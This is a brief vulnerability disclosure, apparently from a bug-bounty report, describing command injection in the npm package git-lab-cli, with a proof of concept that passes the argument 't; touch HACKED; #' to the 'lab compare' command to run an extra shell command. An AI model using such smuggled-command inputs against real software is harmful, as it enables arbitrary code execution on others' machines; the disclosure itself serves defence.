Code Injection in vishwanatharondekar/gitlab-cli
Reported on
May 8th 2020
Description
The git-lab-cli
module is vulnerable against RCE
since a command is crafted using user inputs
not validated and then executedading to arbitrary command injection
POC
- Check there aren't files called
HACKED
- Execute the following commands in another terminal:
npm i git-lab-cli # Install affected module
lab compare -b 't; touch HACKED; #' # Run the PoC
- Recheck the files: now
HACKED
has been created